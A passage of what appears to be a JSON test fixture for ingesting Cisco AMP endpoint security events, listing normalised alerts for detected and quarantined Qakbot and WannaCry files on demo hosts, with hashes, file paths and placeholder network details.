Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6411525251028484000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6411525251028484104", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T16:59:38.000Z", + "file": { + "hash": { + "sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + } + }, + "ecs": { + "version": 
"1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_1" + ], + "hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500147317Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6411525251028484000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": 
{} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "detection_id": "6411525251028484104", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "file": { + "hash": { + "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500149522Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not 
found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "kind": "alert", + "action": "Retrospective Quarantine Attempt Failed", + "id": "6419264043361501000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6419264043361501262", + "event_type_id": 2164260893 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "file": { + "hash": { + "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500151606Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "kind": "alert", + "action": "Retrospective Quarantine Attempt Failed", + "id": "6419264043361501000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 
+ }, + "detection_id": "6419229331435814969", + "event_type_id": 2164260893 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "file": { + "hash": { + "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500153674Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not 
found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "kind": "alert", + "action": "Retrospective Quarantine Attempt Failed", + "id": "6419264043361501000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6419204905956802579", + "event_type_id": 2164260893 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "file": { + "hash": { + "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500155748Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "kind": "alert", + "action": "Retrospective Quarantine", + "id": "6419264043361501000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "detection_id": "6419264043361501261", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648155 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "file": { + 
"name": "u.wnry", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "hash": { + "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500157824Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective 
Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6419264043361501000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Ransom:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419264043361501262", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "file": { + "name": "@WanaDecryptor@.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe", + "hash": { + "sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "md5": 
"7bf2b57f2a205768755c07f238fb32cc" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500160068Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective 
Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6419264043361501000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Ransom:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419264043361501261", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "file": { + "name": "u.wnry", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "hash": { + "sha256": 
"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500162155Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":763000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "kind": "alert", + "action": "Retrospective 
Detection", + "id": "6419264043361501000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Ransom:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419229331435814969", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "file": { + "name": "u.wnry", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "hash": { + "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500164235Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective 
Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6419264043361501000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Ransom:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419204905956802579", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T16:55:46.000Z", + "file": { + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + 
"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500166300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":718000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot 